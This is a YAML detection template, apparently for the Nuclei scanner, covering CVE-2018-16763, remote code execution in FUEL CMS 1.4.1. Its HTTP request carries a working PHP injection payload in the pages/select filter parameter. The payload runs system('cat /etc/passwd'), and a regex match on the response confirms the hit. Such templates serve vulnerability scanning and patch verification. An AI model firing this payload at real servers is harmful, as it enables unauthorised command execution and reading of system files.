45 lines
1.5 KiB
YAML
45 lines
1.5 KiB
YAML
id: CVE-2018-16763
|
|
|
|
info:
|
|
name: FUEL CMS 1.4.1 - Remote Code Execution
|
|
author: pikpikcu
|
|
severity: critical
|
|
description: FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter.
|
|
remediation: |
|
|
Upgrade to FUEL CMS version 1.4.2 or later, which includes a patch for this vulnerability.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/47138
|
|
- https://www.getfuelcms.com/
|
|
- https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-16763
|
|
- https://github.com/daylightstudio/FUEL-CMS/issues/478
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2018-16763
|
|
cwe-id: CWE-74
|
|
epss-score: 0.83439
|
|
epss-percentile: 0.98139
|
|
cpe: cpe:2.3:a:thedaylightstudio:fuel_cms:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: thedaylightstudio
|
|
product: fuel_cms
|
|
tags: cve,cve2018,fuelcms,rce,edb,thedaylightstudio
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a0047304502207b6ce05bfa6b99931dd7e21c4dddd04e681570f65f89405613a333e0a3f6491b02210085d493b62357f6d8f411196c412ea5c7679875ca597d0f89a12cb604351854bb:922c64590222798bb761d5b6d8e72950 |